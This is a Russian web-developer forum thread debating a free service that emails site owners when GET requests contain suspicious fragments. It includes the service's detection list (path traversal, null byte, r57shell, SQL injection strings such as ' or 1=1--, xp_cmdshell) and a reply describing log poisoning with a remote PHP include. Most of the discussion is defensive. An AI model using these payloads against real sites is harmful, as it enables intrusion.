Мониторинг безопасности

[Gal]

Мониторинг безопасности

Здравствуйте, господа программисты
Тему коллективной безопасности, поднятую когда-то мной, я все-таки попытался реализовать в своем проекте http://sos.galenko.com.
Посему предлагаю рассмотреть получившуюся систему мониторинга безопасности.
Принцип работы очень прост: участники размещают код:
<a href="http://sos.galenko.com" target="_blank" title="Бесплатный мониторинг безопасности galenko.com"><iframe src=http://sos.galenko.com/sos.php?id=123 width=88px height=31px scrolling=no border=0 frameborder=0></iframe></a>
Впоследствии мой скрипт принимает и обрабатывает пользовательскую строку запроса. В запросе присутствуют сигнальные фрагменты, участнику высылается сообщение о попытке взлома.
В настоящее время работают следующие сигнальные фрагменты, присутсвие которых в запросе пользователя может быть расценено как попытка взлома:
PHP injection:
../ попытка выйти за пределы указанных директорий
phpinfo() попытка проверить установленную версию php
base64_decode( попытка раскодировать ранее закодированный код взлома
base64_decode (
include( попытка подключить посторонний файл
include (
require(
require (
r57shell понятно, что
http:// попытка подключить удалённый файл
%00 присутствие ноль-байта

SQL injection:
' or 1=1
' or 'a'='a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
master..xp_cmdshell
master..sp_makewebtask
; EXEC

Вопросы:
1. Как Вы считаете, насколько эффективна и полезна разработанная система
2. Какие сигнальные фрагменты, Вы считаете можно добавить к указанным
P.S. Ну и конечно приглашаю всех принять участие и зарегистрироваться на http://sos.galenko.com
С уважением, Евгений.

 

[Andreika]

- передача параметров не ограничивается одним лишь GET
- сам по себе текст "or 1=1--" не несет никакого криминала
- master..xp_cmdshell и ниже вообще не имеют смысла в 99,9999% случаев при использовании mysql
- что опасного в base64_decode/include etc. не знаю даже
- http://www.domain.com/script.php вообще довольно часто используется для переадресации с подсчетом
- про присутствие "ноль-байта" тема не раскрыта

за сим предлагаю тя забанить за тупую рекламу

 

[kruglov]

лично я иногда делаю попытки инъекций, а потом пишу владельцам. меня банить?

 

[Gal]

Уважаемый Андрейка, попытаюсь защитится от незаслуженных упрёков:

- передача параметров не ограничивается одним лишь GET

Умные люди сначала идут по пути наименьших затрат. Гораздо легче сначала прощупать уязвимое место в GET, чем скачивать форму, копаться в HTML, да и заголовки нужно подделывать.

- сам по себе текст "or 1=1--" не несет никакого криминала

Я ещё нигде не видел нормального GET запроса с "or 1=1--", а инъекций на эту тему масса.

- master..xp_cmdshell и ниже вообще не имеют смысла в 99,9999% случаев при использовании mysql

Бережёного Бог бережёт

- что опасного в base64_decode/include etc. не знаю даже

Запрос http://www.domain.com/script.php?<?include('http://qwe.com/qwe.php');?> запишется в логи apache. Которыми потом я смогу воспользоваться так:
http://www.domain.com/script.php?page=./../../../../../../httpd-access.log
Здесь же и ответ на последний вопрос
А base64_decode пригодиться, если в запросе экранируються кавычки

за сим предлагаю тя забанить за тупую рекламу

Есть масса способов порекламировать себя поэффективней, да и сайт то не коммерческий. А что бы не возникало желаний спутать светлую борьбу за счастье пролетариата с буржуазной пропагандой, я хотел бы убрать ссылки, да лимит времени на редактирование вытек

 

[Paxan]

Большего идиотизма я не видел =)
Надо писать приложения без дырок. То что вы предлогаете - это полумеры.

 

[Gal]

Автор оригинала: Paxan
Большего идиотизма я не видел =)
Надо писать приложения без дырок. То что вы предлогаете - это полумеры.

Вы, вероятно, уверены, что пишете без дырок. Предлагаю Вам указать ссылки на Ваши сайты, что бы закрепить Вашу уверенность

 

[Vladson]

Gal
Дело в том что помимо GET инъекции бывают и в POST и в COOKIE и даже в USER-AGENT так что то что вы предлогаете не более чем инструмент для закрывания двери на ключ в то время как вокруг никаких стен вовсе нету...

В итоге либо человек пишет без дыр, либо ваши методы ему помогут максимум на 0.01%.

 

[Paxan]

Gal
Совсем без дырок - нет. Без возможности sql иньекций - да.
Если уж так интересуют мои сайты, то прошу в приват.

 

[Andreika]

Я ещё нигде не видел нормального GET запроса с "or 1=1--", а инъекций на эту тему масса.
http://domain.com/login.php?login=User&pass=or 1=1--&autologin=true
http://www.phpclub.ru/talk/search.php?action=simplesearch&exactname=yes&forumchoice=-1&searchdate=-1&beforeafter=after&sortby=after&sortorder=descending&query=master..xp_cmdshell
и это все будет приходить владельцу сайта на мыло? очень интересно...

а если я примеров использования mysql в инете насобираю и налеплю
$r = mysql_query("SELECT 2+$a") OR die("MySQL ERROR :".mysql_error());
как вы будете свое обещание выполнять?

testx.php
----------------

<? include($file.'.txt'); ?>

test.php
-----------

<? echo "this is a php file" ?>

test.txt
-----------
this is TXT file

------------------------------------------------
Warning: main(.txt): failed to open stream: No such file or directory in testx.php?file=

this is TXT file in testx.php?file=test

Warning: main(test.php.txt): failed to open stream: No such file or directory in testx.php?file=test.php

Warning: main(test.php\0.txt): failed to open stream: No such file or directory in testx.php?file=test.php%00

--------

а уж путь к апачевскому логу вы явно не угадали.. де он находится я и сам не знаю, но явно не в ../.../......../httpd-access

 

[Фанат]

редкостного идиотизма комментарии.
в стиле "мне нужен миллион баксов, поэтому подите с вашей тыщей нах".

Для тех, кому не хватает интеллекта понять, о чём речь, я поясню: Это не система защиты. И не панацея.
И стопроцентная точность от неё не требуется.
Поэтому все упрёки можно засунуть себе туда, откуда они вылезли.
Andreika
сам по себе текст "or 1=1--" не несет никакого криминала. НУ ТАК И ДЕЙСТВИЙ никаких при этом не предпринимается.
Администратору просто посылается уведомление о том, что была такая попытка. Специально для тупых поясняю: Если сигнал был ложный - НИЧЕГО СТРАШНОГО НЕ ПРОИЗОЙДЁТ.

кто у нас там следующий? неграмотный пахан. поджал хвост и убежал в приват. вычёркиваем.

Дуремар владсон. Которому не хватает ума понять, что это опять же - сигнальная система. и то, что она не мониторит пост - это НЕ ПОВОД ОТКАЗЫВАТЬСЯ ОТ МНИТОРИНГА ГЕТ!

Блин, не в первый раз встречаюсь с людской ограниченностью, когда не имея лучшего, они всё равно отказываются от работоспособного решения только потому, что оно не идеальное.
И всё равно удивляюсь.

-~{}~ 23.05.06 09:22:

Gal
теперь о тебе.
насколько я понимаю, вся твоя система строится на анализе реферера? боюсь, что шансы отловить попытку взлома у неё нулевые.

 

[Andreika]

Фанат
есть (вот уж не знаю чья) народная сказка про малчыка и волка... мальчик слишком часто кричал "вОлки! вОлки!" и в итоге его эти вОлки и сожрали... через неделю использования этой фикни ты получишь стока мусора в почту, что читать его в следующий раз будет вообще не интересно... а потом прийдут волки..
а уж письмо "по итогам месяца" -- это вообще хит продаж.. оперативное реагирование обеспечено.

в этом смысле обертка над mysql функциями или проверка (скриптом) еррорлога была бы интереснее просмотра того, что сей товарищ посчитал опасным... тем более, что у нас разные представления об "опасности"

 

[Фанат]

Молодец.
после пинка начал писать что-то осмысленное.
Можешь ведь, если захочешь.
правда, о том, что система по результатам тестирования вполне может быть отстроена для лучшего соотношения сигнал/шум, ты, почему-то не догадался.

Но всё равно - твои предыдущие пассажи про логин гетом - редкий образец идиотизма и передёргивания.
следи, пожалуйста, за своим базаром.